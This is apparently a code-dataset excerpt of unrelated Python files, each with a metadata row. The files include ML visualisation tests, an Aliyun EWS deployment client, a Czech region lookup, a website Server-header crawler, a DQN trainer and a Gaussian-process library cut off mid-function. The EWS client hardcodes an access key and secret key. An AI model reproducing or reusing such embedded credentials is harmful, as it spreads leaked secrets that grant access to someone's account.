], metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd", algorithm=diabetes_progression_algorithm())
html = visual.render(driver=driver, result=result)
assert str(html) == expected_html
@pytest.mark.parametrize("element_cls,expected_html,input_data", row_explain_elements)
def test_create_explainable_elements_for_ml(element_cls, expected_html, input_data):
driver = MemoryDriver.from_reference("A1", autocreate=True)
visual = Visual(elements=[
element_cls()
], metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd", algorithm=diabetes_progression_algorithm())
context = visual.generate_context(input_data=input_data)
html = visual.render(driver=driver, context=context)
assert str(html) == expected_html
def test_show_prediction_handles_expressions():
driver = MemoryDriver.from_reference("A1", autocreate=True)
algo = diabetes_progression_algorithm()
visual = Visual(
elements=[Prediction(title="Predicted amount",expression="value * 100",suffix="%",as_value=True)
], metadata_filename = EXAMPLE_PATH + "/metadata/row_scope.emd", algorithm = algo)
result = algo.single_result(prog_input_data)
html = visual.render(driver=driver, result=result)
assert str(html) == anys.AnyContains("100.00%")
| rcfgroup/easul | easul/tests/visual/test_prediction.py | test_prediction.py | py | 2,967 | python | en | code | 1 | github-code | 36 |
32487421332 | #-*-coding:utf-8 -*-
import sys
import hmac
import hashlib
import time
import requests
import json
import urllib
import top
class ewsServiceApi:
'''
Aliyun EWS service api
'''
def __init__(self,accesskey,secretkey):
self.accesskey = accesskey
self.secrekey = secretkey
self.timestamp = int(1000 * time.time())
def sign(self,secret, parameters):
if hasattr(parameters, "items"):
keys = parameters.keys()
sorted(keys)
parameters = "%s%s%s" % (secret,str().join('%s%s' % (key, parameters[key]) for key in keys),secret)
# print(parameters)
SecretKey = self.secrekey
sign = hmac.new(
SecretKey.encode('utf-8'),
parameters.encode('utf-8'),
hashlib.md5
).hexdigest().upper()
return sign
def get(self,geturl):
parames = {
'accesskey':self.accesskey,
'timestamp':self.timestamp,
}
sign = self.sign(self.secrekey,parames)
headers = {'Authorization':sign}
req = requests.get(geturl,params=parames,headers=headers)
context = json.loads(req.text)
return context
# print(context)
def post(self, deployurl,node_id,comment):
parameters = {
'accesskey': self.accesskey,
'comment':comment,
'method': 'SEQUENTIAL',
'node_id':node_id,
'timestamp': self.timestamp,
'update': "false",
'url': deployurl,
}
sign = self.sign(self.secrekey,parameters)
headers = {'Authorization':sign}
serivceUrl = 'http://open-ews.cloud.tmall.com/api/v1/node/{0}/uploadStart/'.format(node_id)
res = requests.post(url=serivceUrl,params=parameters,headers=headers)
aa = json.loads(res.text)
print(aa)
if __name__ == '__main__':
a = ewsServiceApi(
accesskey='kqlnim0khfpou45p',
secretkey='7226d410ef16427e821e61ebe30e8939'
)
a.get(geturl='http://open-ews.cloud.tmall.com/api/v1/service/')
a.post(deployurl = 'http://10.26.235.132/job/meetyou-youzijie-center-new/ws/youzijie-center.war',node_id=622290,comment='临时处理推荐商品专场过滤111')
| opnms/opnms | base/ewsService.py | ewsService.py | py | 2,267 | python | en | code | 0 | github-code | 36 |
13958593890 | class URL_helper:
def __init__(self):
self.__HOUSE_TYPES_LIST = ['rodinne-domy', 'vily', 'chalupy', 'chaty', 'projekty-na-klic', 'zemedelske-usedlosti',
'pamatky-jine', 'vicegeneracni-domy']
self.__HOUSE_LOCATIONS_DICT = {'Karlovarsky': ['cheb', 'karlovy-vary','sokolov'],
'Plzensky': ['tachov', 'rokycany', 'plzen-sever', 'plzen', 'plzen-jih', 'klatovy', 'domazlice'],
'Ustecky': ['usti-nad-labem', 'teplice', 'most', 'louny', 'litomerice', 'decin', 'chomutov'],
'Stredocesky': ['benesov', 'beroun', 'kladno', 'kolin', 'kutna-hora', 'melnik', 'mlada-boleslav', 'nymburk', 'praha-vychod', 'praha-zapad', 'pribram', 'rakovnik'],
'Praha': ['praha-1', 'praha-2', 'praha-3', 'praha-4', 'praha-5', 'praha-6', 'praha-7', 'praha-8', 'praha-9', 'praha-10'],
'Jihocesky': ['ceske-budejovice', 'cesky-krumlov', 'jindrichuv-hradec', 'pisek', 'prachatice', 'strakonice', 'tabor'],
'Vysocine': ['havlickuv-brod', 'jihlava', 'pelhrimov', 'trebic', 'zdar-nad-sazavou'],
'Pardubicky': ['chrudim', 'pardubice', 'svitavy', 'usti-nad-orlici'],
'Kralovehradecky': ['hradec-kralove', 'jicin', 'nachod', 'rychnov-nad-kneznou', 'trutnov'],
'Liberecky': ['ceska-lipa', 'jablonec-nad-nisou', 'liberec', 'semily'],
'Jihomoravsky': ['blansko', 'breclav', 'brno', 'brno-venkov', 'hodonin', 'vyskov', 'znojmo'],
'Olomoucky': ['olomouc', 'prerov', 'jesenik', 'prostejov', 'sumperk'],
'Zlinsky': ['kromeriz', 'uherske-hradiste', 'vsetin', 'zlin'],
'Moravskoslezsky': ['bruntal', 'frydek-mistek', 'karvina', 'novy-jicin', 'opava', 'ostrava']}
self.__ENGLISH_NAME_TO_CZECH = {'Praha': 'Prague', 'benesov': 'Benešov', 'beroun': 'Beroun', 'kladno': 'Kladno', 'kolin': 'Kolín',
'kutna-hora': 'Kutná Hora', 'melnik': 'Mělník', 'mlada-boleslav': 'Mladá Boleslav', 'nymburk': 'Nymburk',
'praha-vychod': 'Prague-East', 'praha-zapad': 'Prague-West', 'pribram': 'Příbram', 'rakovnik': 'Rakovník',
'ceske-budejovice': 'České Budějovice','cesky-krumlov': 'Český Krumlov','jindrichuv-hradec': 'Jindřichův Hradec',
'pisek': 'Písek', 'prachatice': 'Prachatice', 'strakonice': 'Strakonice', 'tabor': 'Tábor', 'domazlice': 'Domažlice',
'klatovy': 'Klatovy', 'plzen': 'Plzeň-City', 'plzen-jih': 'Plzeň-South', 'plzen-sever': 'Plzeň-North',
'rokycany': 'Rokycany', 'tachov': 'Tachov', 'cheb': 'Cheb', 'karlovy-vary': 'Karlovy Vary', 'sokolov': 'Sokolov',
'chomutov': 'Chomutov', 'decin': 'Děčín', 'litomerice': 'Litoměřice', 'louny': 'Louny', 'most': 'Most', 'teplice': 'Teplice',
'usti-nad-labem': 'Ústí nad Labem', 'ceska-lipa': 'Česká Lípa', 'jablonec-nad-nisou': 'Jablonec nad Nisou',
'liberec': 'Liberec', 'semily': 'Semily', 'hradec-kralove': 'Hradec Králové', 'jicin': 'Jičín', 'nachod': 'Náchod',
'rychnov-nad-kneznou': 'Rychnov nad Kněžnou', 'trutnov': 'Trutnov', 'chrudim': 'Chrudim', 'pardubice': 'Pardubice',
'svitavy': 'Svitavy', 'usti-nad-orlici': 'Ústí nad Orlicí', 'havlickuv-brod': 'Havlíčkův Brod', 'jihlava': 'Jihlava',
'pelhrimov': 'Pelhřimov', 'trebic': 'Třebíč', 'zdar-nad-sazavou': 'Žďár nad Sázavou', 'blansko': 'Blansko',
'breclav': 'Břeclav', 'brno': 'Brno-City', 'brno-venkov': 'Brno-Country', 'hodonin': 'Hodonín', 'vyskov': 'Vyškov',
'znojmo': 'Znojmo', 'jesenik': 'Jeseník', 'olomouc': 'Olomouc', 'prerov': 'Přerov', 'prostejov': 'Prostějov',
'sumperk': 'Šumperk', 'kromeriz': 'Kroměříž', 'uherske-hradiste': 'Uherské Hradiště', 'vsetin': 'Vsetín',
'zlin': 'Zlín', 'bruntal': 'Bruntál', 'frydek-mistek': 'Frýdek-Místek', 'karvina': 'Karviná', 'novy-jicin': 'Nový Jičín',
'opava': 'Opava', 'ostrava': 'Ostrava-City'}
def getEnglishNameToCzechDict(self):
return self.__ENGLISH_NAME_TO_CZECH
def getHouseTypesList(self):
return self.__HOUSE_TYPES_LIST
def getHouseLocationsDict(self):
return self.__HOUSE_LOCATIONS_DICT
def getLocationsSet(self):
regionsSet = set()
for region in self.__HOUSE_LOCATIONS_DICT:
if region == 'Praha':
regionsSet.add('praha')
else:
regionsSet = regionsSet.union(set(self.__HOUSE_LOCATIONS_DICT[region]))
return regionsSet
def getLen(self):
return len(self.getLocationsSet())
| eugenganenco/SRealty | webScraper/URL_helper.py | URL_helper.py | py | 5,434 | python | cs | code | 0 | github-code | 36 |
34353676149 | import requests
from bs4 import BeautifulSoup
from time import sleep
import json
from sqlalchemy import create_engine,Column,Integer,String,ForeignKey,table, column, select, update, insert
from sqlalchemy.ext.declarative import declarative_base
from urlparse import urlparse
from sqlalchemy.orm import sessionmaker
from sqlalchemy import *
start = "http://register.start.bg/"
f = requests.get(start)
soup = BeautifulSoup(f.text, 'html.parser')
websites = {}
Base = declarative_base()
engine = create_engine('sqlite:///servers.db', echo = True)
Session = sessionmaker(bind=engine)
session = Session()
metadata = MetaData()
connection = engine.connect()
servers = Table('servers', metadata,
Column('user_id', Integer, primary_key=True),
Column('server', String, nullable=False),
Column('website', String)
)
count = 0
metadata.create_all(engine)
for link in soup.find_all('a'):
l = link.get('href')
#if(not type(l) is None or not type(l)is unicode):
#print(l)
ext = ".bg"
ht = "http"
print(count)
if l is None:
continue
elif u"link.php" in l :
try:
lin = start + str(l)
obj1 = requests.get(lin)
parsed = urlparse(lin)
exists = False
for key in obj1.headers:
if(key == "Server"):
exists = True
break
if(exists):
#is_chunked = obj1.headers.get('transfer-encoding', '') == 'chunked'
#if(is_chunked):
#continue
#elif(obj1.status_code != 200):
#print("different status code from 200")
#continue
#else:
if(parsed.netloc not in websites):
engine.execute(servers.insert(),server = obj1.headers["Server"],website = obj1.url)
count +=1
else:
continue
except requests.exceptions.ConnectionError as e:
pass
elif ext and ht in l:
try:
obj = requests.get(l)
#is_chunked = obj.headers.get('transfer-encoding', '') == 'chunked'
#if(is_chunked):
#continue
#elif(obj.status_code != 200):
#print("differen t status code from 200")
#continue
#else:
parsed = urlparse(obj.url)
if(parsed.netloc not in websites):
engine.execute(servers.insert(),server = obj.headers["Server"], website = obj.url)
count +=1
else:
websites[parsed.netloc] +=1
except requests.exceptions.ConnectionError as e:
pass
else:
continue
if(count >= 10):
break
s = select([distinct(servers.c.server)])
result = connection.execute(s)
for row in result:
websites[row[0]] = 0
s = select([servers.c.server])
result = connection.execute(s)
for row in result:
websites[row[0]] +=1
print(websites)
| VladislavSpassov/HackBulgariaTasks | Week13/CrawnBGWebsites.py | CrawnBGWebsites.py | py | 3,072 | python | en | code | 0 | github-code | 36 |
34642170576 | #!/usr/bin/python3
from network import Model
from Experiences import Experiences
import numpy as np
model = Model()
experiences = Experiences()
print('experiences ', len(experiences.get()[0]))
for i in range(10):
model_loss = model.model_train(experiences, False)
print('model', model_loss)
model.save()
for i in range(10):
dqn_loss = model.dqn_train(experiences, False)
print('dqn', dqn_loss)
model.save() | uberthought/DQN | offline_train.py | offline_train.py | py | 435 | python | en | code | 0 | github-code | 36 |
18306688211 | from PIL import Image
img=Image.open(r"C:\Users\rohan\Downloads\Pictures\IMG_5093.jpg")
height=img.height
width=img.width
print(f"Height:{height} Width:{width}")
r,g,b=img.getpixel((100,100))
print(f"R:{r} G:{g} B:{b}")
img2=img.convert("L")
img2.show()
img2=img2.save(r"C:\Users\rohan\Downloads\Pictures\test2.jpeg")
img3=img.rotate(180)
img3.show()
img3=img3.save(r"C:\Users\rohan\Downloads\Pictures\test3.jpeg")
| rohanxd1/Codes | Python/TEST.py | TEST.py | py | 416 | python | en | code | 0 | github-code | 36 |
11519320722 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
from types import FunctionType
from fdm import central_fdm
from lab import B
from plum import Dispatcher, Self, Referentiable, type_parameter, Union
from .util import uprank
from .input import Input, At, MultiInput
from .kernel import ZeroKernel, PosteriorKernel, TensorProductKernel, \
CorrectiveKernel, OneKernel
from .lazy import LazyVector, LazyMatrix
from .matrix import matrix, Diagonal, dense
from .mean import PosteriorMean, ZeroMean, OneMean
from .mokernel import MultiOutputKernel as MOK
from .momean import MultiOutputMean as MOM
from .random import Random, PromisedGP, RandomProcess, Normal
__all__ = ['GP',
'model',
'Graph',
'AbstractObservations',
'Observations', 'Obs',
'SparseObservations', 'SparseObs']
log = logging.getLogger(__name__)
def ensure_at(x, ref=None):
"""Ensure that an input location is typed with `At` to specify which
process it belongs to.
Args:
x (input): Input location.
ref (:class:`.graph.GP`, optional): Reference process. If provided and
`x` is not an instance of `At`, then it assumed to belong to `ref`.
Returns:
:class:`.input.At`: Input, instance of `At`.
"""
if isinstance(x, At):
return x
elif ref is not None:
return ref(x)
else:
raise ValueError('Must explicitly specify the processes which to '
'condition on.')
class AbstractObservations(Referentiable):
"""Abstract base class for observations."""
_dispatch = Dispatcher(in_class=Self)
@_dispatch({B.Numeric, Input}, B.Numeric, [PromisedGP])
def __init__(self, x, y, ref=None):
self._ref = ref
self.x = ensure_at(x, self._ref)
self.y = y
self.graph = type_parameter(self.x).graph
@_dispatch([Union(tuple, list, PromisedGP)])
def __init__(self, *pairs, **kw_args):
# Check whether there's a reference.
self._ref = kw_args['ref'] if 'ref' in kw_args else None
# Ensure `At` for all pairs.
pairs = [(ensure_at(x, self._ref), y) for x, y in pairs]
# Get the graph from the first pair.
self.graph = type_parameter(pairs[0][0]).graph
# Extend the graph by the Cartesian product `p` of all processes.
p = self.graph.cross(*self.graph.ps)
# Condition on the newly created vector-valued GP.
xs, ys = zip(*pairs)
self.x = p(MultiInput(*xs))
self.y = B.concat(*[uprank(y) for y in ys], axis=0)
@_dispatch({tuple, list})
def __ror__(self, ps):
return self.graph.condition(ps, self)
def posterior_kernel(self, p_i, p_j): # pragma: no cover
"""Get the posterior kernel between two processes.
Args:
p_i (:class:`.graph.GP`): First process.
p_j (:class:`.graph.GP`): Second process.
Returns:
:class:`.kernel.Kernel`: Posterior kernel between the first and
second process.
"""
raise NotImplementedError('Posterior kernel construction not '
'implemented.')
def posterior_mean(self, p): # pragma: no cover
"""Get the posterior kernel of a process.
Args:
p (:class:`.graph.GP`): Process.
Returns:
:class:`.mean.Mean`: Posterior mean of `p`.
"""
raise NotImplementedError('Posterior mean construction not '
'implemented.')
class Observations(AbstractObservations, Referentiable):
"""Observations.
Can alternatively construct an instance of `Observations` with tuples or
lists of valid constructors.
Args:
x (input): Locations of points to condition on.
y (tensor): Observations to condition on.
ref (:class:`.class.GP`, optional): Reference process. See
:func:`.graph.ensure_at`.
"""
_dispatch = Dispatcher(in_class=Self)
def __init__(self, *args, **kw_args):
AbstractObservations.__init__(self, *args, **kw_args)
self._K_x = None
@property
def K_x(self):
"""Kernel matrix of the data."""
if self._K_x is None: # Cache computation.
p_x, x = type_parameter(self.x), self.x.get()
self._K_x = matrix(self.graph.kernels[p_x](x))
return self._K_x
def posterior_kernel(self, p_i, p_j):
p_x, x = type_parameter(self.x), self.x.get()
return PosteriorKernel(self.graph.kernels[p_i, p_j],
self.graph.kernels[p_x, p_i],
self.graph.kernels[p_x, p_j],
x, self.K_x)
def posterior_mean(self, p):
p_x, x = type_parameter(self.x), self.x.get()
return PosteriorMean(self.graph.means[p],
self.graph.means[p_x],
self.graph.kernels[p_x, p],
x, self.K_x, self.y)
class SparseObservations(AbstractObservations, Referentiable):
"""Observations through inducing points. Takes further arguments
according to the constructor of :class:`.graph.Observations`.
Attributes:
elbo (scalar): ELBO.
Args:
z (input): Locations of the inducing points.
e (:class:`.graph.GP`): Additive, independent noise process.
"""
_dispatch = Dispatcher(in_class=Self)
@_dispatch({B.Numeric, Input, tuple, list},
[Union(tuple, list, PromisedGP)])
def __init__(self, z, *pairs, **kw_args):
es, xs, ys = zip(*pairs)
AbstractObservations.__init__(self, *zip(xs, ys), **kw_args)
SparseObservations.__init__(self,
z,
self.graph.cross(*es),
self.x,
self.y,
**kw_args)
@_dispatch({list, tuple},
PromisedGP,
{B.Numeric, Input},
B.Numeric,
[PromisedGP])
def __init__(self, zs, e, x, y, ref=None):
# Ensure `At` everywhere.
zs = [ensure_at(z, ref=ref) for z in zs]
# Extract graph.
graph = type_parameter(zs[0]).graph
# Create a representative multi-output process.
p_z = graph.cross(*(type_parameter(z) for z in zs))
SparseObservations.__init__(self,
p_z(MultiInput(*zs)),
e, x, y, ref=ref)
@_dispatch({B.Numeric, Input},
PromisedGP,
{B.Numeric, Input},
B.Numeric,
[PromisedGP])
def __init__(self, z, e, x, y, ref=None):
AbstractObservations.__init__(self, x, y, ref=ref)
self.z = ensure_at(z, self._ref)
self.e = e
self._K_z = None
self._elbo = None
self._mu = None
self._A = None
@property
def K_z(self):
"""Kernel matrix of the data."""
if self._K_z is None: # Cache computation.
self._compute()
return self._K_z
@property
def elbo(self):
"""ELBO."""
if self._elbo is None: # Cache computation.
self._compute()
return self._elbo
@property
def mu(self):
"""Mean of optimal approximating distribution."""
if self._mu is None: # Cache computation.
self._compute()
return self._mu
@property
def A(self):
"""Parameter of the corrective variance of the kernel of the optimal
approximating distribution."""
if self._A is None: # Cache computation.
self._compute()
return self._A
def _compute(self):
# Extract processes.
p_x, x = type_parameter(self.x), self.x.get()
p_z, z = type_parameter(self.z), self.z.get()
# Construct the necessary kernel matrices.
K_zx = self.graph.kernels[p_z, p_x](z, x)
self._K_z = matrix(self.graph.kernels[p_z](z))
# Evaluating `e.kernel(x)` will yield incorrect results if `x` is a
# `MultiInput`, because `x` then still designates the particular
# components of `f`. Fix that by instead designating the elements of
# `e`.
if isinstance(x, MultiInput):
x_n = MultiInput(*(p(xi.get())
for p, xi in zip(self.e.kernel.ps, x.get())))
else:
x_n = x
# Construct the noise kernel matrix.
K_n = self.e.kernel(x_n)
# The approximation can only handle diagonal noise matrices.
if not isinstance(K_n, Diagonal):
raise RuntimeError('Kernel matrix of noise must be diagonal.')
# And construct the components for the inducing point approximation.
L_z = B.cholesky(self._K_z)
self._A = B.eye(self._K_z) + \
B.qf(K_n, B.transpose(B.trisolve(L_z, K_zx)))
y_bar = uprank(self.y) - self.e.mean(x_n) - self.graph.means[p_x](x)
prod_y_bar = B.trisolve(L_z, B.qf(K_n, B.transpose(K_zx), y_bar))
# Compute the optimal mean.
self._mu = self.graph.means[p_z](z) + \
B.qf(self._A, B.trisolve(L_z, self._K_z), prod_y_bar)
# Compute the ELBO.
# NOTE: The calculation of `trace_part` asserts that `K_n` is diagonal.
# The rest, however, is completely generic.
trace_part = B.ratio(Diagonal(self.graph.kernels[p_x].elwise(x)[:, 0]) -
Diagonal(B.qf_diag(self._K_z, K_zx)), K_n)
det_part = B.logdet(2 * B.pi * K_n) + B.logdet(self._A)
qf_part = B.qf(K_n, y_bar)[0, 0] - B.qf(self._A, prod_y_bar)[0, 0]
self._elbo = -0.5 * (trace_part + det_part + qf_part)
def posterior_kernel(self, p_i, p_j):
p_z, z = type_parameter(self.z), self.z.get()
return PosteriorKernel(self.graph.kernels[p_i, p_j],
self.graph.kernels[p_z, p_i],
self.graph.kernels[p_z, p_j],
z, self.K_z) + \
CorrectiveKernel(self.graph.kernels[p_z, p_i],
self.graph.kernels[p_z, p_j],
z, self.A, self.K_z)
def posterior_mean(self, p):
p_z, z = type_parameter(self.z), self.z.get()
return PosteriorMean(self.graph.means[p],
self.graph.means[p_z],
self.graph.kernels[p_z, p],
z, self.K_z, self.mu)
Obs = Observations #: Shorthand for `Observations`.
SparseObs = SparseObservations #: Shorthand for `SparseObservations`.
class Graph(Referentiable):
"""A GP model."""
_dispatch = Dispatcher(in_class=Self)
def __init__(self):
self.ps = []
self.pids = set()
self.kernels = LazyMatrix()
self.means = LazyVector()
# Store named GPs in both ways.
self.gps_by_name = {}
self.names_by_gp = {}
@_dispatch(str)
def __getitem__(self, name):
return self.gps_by_name[name]
@_dispatch(PromisedGP)
def __getitem__(self, p):
return self.names_by_gp[id(p)]
@_dispatch(PromisedGP, str)
def name(self, p, name):
"""Name a GP.
Args:
p (:class:`.graph.GP`): GP to name.
name (str): Name. Must be unique.
"""
# Delete any existing names and back-references for the GP.
if id(p) in self.names_by_gp:
del self.gps_by_name[self.names_by_gp[id(p)]]
del self.names_by_gp[id(p)]
# Check that name is not in use.
if name in self.gps_by_name:
raise RuntimeError('Name "{}" for "{}" already taken by "{}".'
''.format(name, p, self[name]))
# Set the name and the back-reference.
self.gps_by_name[name] = p
self.names_by_gp[id(p)] = name
def _add_p(self, p):
self.ps.append(p)
self.pids.add(id(p))
def _update(self, mean, k_ii_generator, k_ij_generator):
p = GP(self)
self.means[p] = mean
self.kernels.add_rule((p, p), self.pids, k_ii_generator)
self.kernels.add_rule((p, None), self.pids, k_ij_generator)
self.kernels.add_rule((None, p), self.pids,
lambda pi: reversed(self.kernels[p, pi]))
self._add_p(p)
return p
def add_independent_gp(self, p, kernel, mean):
"""Add an independent GP to the model.
Args:
p (:class:`.graph.GP`): GP object to add.
kernel (:class:`.kernel.Kernel`): Kernel function of GP.
mean (:class:`.mean.Mean`): Mean function of GP.
Returns:
:class:`.graph.GP`: The newly added independent GP.
"""
# Update means.
self.means[p] = mean
# Add rule to kernels.
self.kernels[p] = kernel
self.kernels.add_rule((p, None), self.pids, lambda pi: ZeroKernel())
self.kernels.add_rule((None, p), self.pids, lambda pi: ZeroKernel())
self._add_p(p)
return p
@_dispatch(object, PromisedGP)
def sum(self, other, p):
"""Sum a GP from the graph with another object.
Args:
obj1 (other type or :class:`.graph.GP`): First term in the sum.
obj2 (other type or :class:`.graph.GP`): Second term in the sum.
Returns:
:class:`.graph.GP`: The GP corresponding to the sum.
"""
return self.sum(p, other)
@_dispatch(PromisedGP, object)
def sum(self, p, other):
return self._update(self.means[p] + other,
lambda: self.kernels[p],
lambda pi: self.kernels[p, pi])
@_dispatch(PromisedGP, PromisedGP)
def sum(self, p1, p2):
# Check that the GPs are on the same graph.
if p1.graph != p2.graph:
raise RuntimeError('Can only add GPs from the same graph.')
return self._update(self.means[p1] + self.means[p2],
(lambda: self.kernels[p1] +
self.kernels[p2] +
self.kernels[p1, p2] +
self.kernels[p2, p1]),
lambda pi: self.kernels[p1, pi] +
self.kernels[p2, pi])
@_dispatch(PromisedGP, B.Numeric)
def mul(self, p, other):
"""Multiply a GP from the graph with another object.
Args:
p (:class:`.graph.GP`): GP in the product.
other (object): Other object in the product.
Returns:
:class:`.graph.GP`: The GP corresponding to the product.
"""
return self._update(self.means[p] * other,
lambda: self.kernels[p] * other ** 2,
lambda pi: self.kernels[p, pi] * other)
@_dispatch(PromisedGP, FunctionType)
def mul(self, p, f):
def ones(x):
return B.ones(B.dtype(x), B.shape(x)[0], 1)
return self._update(f * self.means[p],
lambda: f * self.kernels[p],
(lambda pi: TensorProductKernel(f, ones) *
self.kernels[p, pi]))
def shift(self, p, shift):
"""Shift a GP.
Args:
p (:class:`.graph.GP`): GP to shift.
shift (object): Amount to shift by.
Returns:
:class:`.graph.GP`: The shifted GP.
"""
return self._update(self.means[p].shift(shift),
lambda: self.kernels[p].shift(shift),
lambda pi: self.kernels[p, pi].shift(shift, 0))
def stretch(self, p, stretch):
"""Stretch a GP.
Args:
p (:class:`.graph.GP`): GP to stretch.
stretch (object): Extent of stretch.
Returns:
:class:`.graph.GP`: The stretched GP.
"""
return self._update(self.means[p].stretch(stretch),
lambda: self.kernels[p].stretch(stretch),
lambda pi: self.kernels[p, pi].stretch(stretch, 1))
def select(self, p, *dims):
"""Select input dimensions.
Args:
p (:class:`.graph.GP`): GP to select input
dimensions from.
*dims (object): Dimensions to select.
Returns:
:class:`.graph.GP`: GP with the specific input dimensions.
"""
return self._update(self.means[p].select(dims),
lambda: self.kernels[p].select(dims),
lambda pi: self.kernels[p, pi].select(dims, None))
def transform(self, p, f):
"""Transform the inputs of a GP.
Args:
p (:class:`.graph.GP`): GP to input transform.
f (function): Input transform.
Returns:
:class:`.graph.GP`: Input-transformed GP.
"""
return self._update(self.means[p].transform(f),
lambda: self.kernels[p].transform(f),
lambda pi: self.kernels[p, pi].transform(f, None))
def diff(self, p, dim=0):
"""Differentiate a GP.
Args:
p (:class:`.graph.GP`): GP to differentiate.
dim (int, optional): Dimension of feature which to take the
derivative with respect to. Defaults to `0`.
Returns:
:class:`.graph.GP`: Derivative of GP.
"""
return self._update(self.means[p].diff(dim),
lambda: self.kernels[p].diff(dim),
lambda pi: self.kernels[p, pi].diff(dim, None))
@_dispatch({list, tuple}, AbstractObservations)
def condition(self, ps, obs):
"""Condition the graph on observations.
Args:
ps (list[:class:`.graph.GP`]): Processes to condition.
obs (:class:`.graph.AbstractObservations`): Observations to
condition on.
Returns:
list[:class:`.graph.GP`]: Posterior processes.
"""
# A construction like this is necessary to properly close over `p`.
def build_gens(p):
def k_ij_generator(pi):
return obs.posterior_kernel(p, pi)
def k_ii_generator():
return obs.posterior_kernel(p, p)
return k_ii_generator, k_ij_generator
return [self._update(obs.posterior_mean(p), *build_gens(p)) for p in ps]
def cross(self, *ps):
"""Construct the Cartesian product of a collection of processes.
Args:
*ps (:class:`.graph.GP`): Processes to construct the
Cartesian product of.
Returns:
:class:`.graph.GP`: The Cartesian product of `ps`.
"""
mok = MOK(*ps)
return self._update(MOM(*ps),
lambda: mok,
lambda pi: mok.transform(None, lambda y: At(pi)(y)))
@_dispatch(int, [At])
def sample(self, n, *xs):
"""Sample multiple processes simultaneously.
Args:
n (int, optional): Number of samples. Defaults to `1`.
*xs (:class:`.graph.At`): Locations to sample at.
Returns:
tuple: Tuple of samples.
"""
sample = GP(MOK(*self.ps),
MOM(*self.ps),
graph=Graph())(MultiInput(*xs)).sample(n)
# To unpack `x`, just keep `.get()`ing.
def unpack(x):
while isinstance(x, Input):
x = x.get()
return x
# Unpack sample.
lengths = [B.shape(uprank(unpack(x)))[0] for x in xs]
i, samples = 0, []
for length in lengths:
samples.append(sample[i:i + length, :])
i += length
return samples[0] if len(samples) == 1 else samples
@_dispatch([At])
def sample(self, *xs):
return self.sample(1, *xs)
@_dispatch([{list, tuple}])
def logpdf(self, *pairs):
xs, ys = zip(*pairs)
# Check that all processes are specified.
if not all([isinstance(x, At) for x in xs]):
raise ValueError('Must explicitly specify the processes which to '
'compute the log-pdf for.')
# Uprank all outputs and concatenate.
y = B.concat(*[uprank(y) for y in ys], axis=0)
# Return composite log-pdf.
return GP(MOK(*self.ps),
MOM(*self.ps),
graph=Graph())(MultiInput(*xs)).logpdf(y)
@_dispatch(At, B.Numeric)
def logpdf(self, x, y):
return x.logpdf(y)
@_dispatch(Observations)
def logpdf(self, obs):
return obs.x.logpdf(obs.y)
@_dispatch(SparseObservations)
def logpdf(self, obs):
return obs.elbo
model = Graph() #: A default graph provided for convenience
class GP(RandomProcess, Referentiable):
"""Gaussian process.
Args:
kernel (:class:`.kernel.Kernel`): Kernel of the
process.
mean (:class:`.mean.Mean`, optional): Mean function of the
process. Defaults to zero.
graph (:class:`.graph.Graph`, optional): Graph to attach to.
"""
_dispatch = Dispatcher(in_class=Self)
@_dispatch([object])
def __init__(self, kernel, mean=None, graph=model, name=None):
# Resolve kernel.
if isinstance(kernel, (B.Numeric, FunctionType)):
kernel = kernel * OneKernel()
# Resolve mean.
if mean is None:
mean = ZeroMean()
elif isinstance(mean, (B.Numeric, FunctionType)):
mean = mean * OneMean()
# Then add a new `GP` to the graph with the resolved kernel and mean.
self.graph = graph
self.graph.add_independent_gp(self, kernel, mean)
# If a name is given, set the name.
if name:
self.graph.name(self, name)
@_dispatch(Graph)
def __init__(self, graph):
self.graph = graph
@property
def kernel(self):
"""Kernel of the GP."""
return self.graph.kernels[self]
@property
def mean(self):
"""Mean function of the GP."""
return self.graph.means[self]
@property
def name(self):
"""Name of the GP."""
return self.graph[self]
@name.setter
@_dispatch(str)
def name(self, name):
self.graph.name(self, name)
def __call__(self, x):
"""Construct a finite-dimensional distribution at specified locations.
Args:
x (input): Points to construct the distribution at.
Returns:
:class:`.random.Normal`: Finite-dimensional distribution.
"""
return Normal(self, x)
@_dispatch([object])
def condition(self, *args):
"""Condition the GP. See :meth:`.graph.Graph.condition`."""
return self.graph.condition((self,), Observations(*args, ref=self))[0]
@_dispatch(AbstractObservations)
def condition(self, obs):
return self.graph.condition((self,), obs)[0]
@_dispatch(object)
def __add__(self, other):
return self.graph.sum(self, other)
@_dispatch(Random)
def __add__(self, other):
raise NotImplementedError('Cannot add a GP and a {}.'
''.format(type(other).__name__))
@_dispatch(Self)
def __add__(self, other):
return self.graph.sum(self, other)
@_dispatch(object)
def __mul__(self, other):
return self.graph.mul(self, other)
@_dispatch(Random)
def __mul__(self, other):
raise NotImplementedError('Cannot multiply a GP and a {}.'
''.format(type(other).__name__))
@_dispatch(Self)
def __mul__(self, other):
return (lambda x: self.graph.means[self](x)) * other + \
self * (lambda x: self.graph.means[other](x)) + \
GP(kernel=self.graph.kernels[self] *
self.graph.kernels[other] +
self.graph.kernels[self, other] *
self.graph.kernels[other, self],
mean=-self.graph.means[self] *
self.graph.means[other],
graph=self.graph)
@_dispatch([object])
def __or__(self, args):
"""Shorthand for conditioning."""
return self.condition(Observations(*args, ref=self))
@_dispatch(AbstractObservations)
def __or__(self, obs):
return self.condition(obs)
def shift(self, shift):
"""Shift the GP. See :meth:`.graph.Graph.shift`."""
return self.graph.shift(self, shift)
def stretch(self, stretch):
"""Stretch the GP. See :meth:`.graph.Graph.stretch`."""
return self.graph.stretch(self, stretch)
def __gt__(self, stretch):
"""Shorthand for :meth:`.graph.GP.stretch`."""
return self.stretch(stretch)
def transform(self, f):
"""Input transform the GP. See :meth:`.graph.Graph.transform`."""
return self.graph.transform(self, f)
def select(self, *dims):
"""Select dimensions from the input. See :meth:`.graph.Graph.select`."""
return self.graph.select(self, *dims)
def __getitem__(self, *dims):
"""Shorthand for :meth:`.graph.GP.select`."""
return self.select(*dims)
def diff(self, dim=0):
"""Differentiate the GP. See :meth:`.graph.Graph.diff`."""
return self.graph.diff(self, dim)
def diff_approx(self, deriv=1, order=6):
"""Approximate the derivative of the GP by constructing a finite
difference approximation.
Args:
deriv (int): Order of the derivative.
order (int): Order of the estimate.
Returns:
Approximation of the derivative of the GP.
"""
# Use the FDM library to figure out the coefficients.
fdm = central_fdm(order, deriv, adapt=0, factor=1e8)
fdm.estimate() # Estimate step size.
# Construct finite difference.
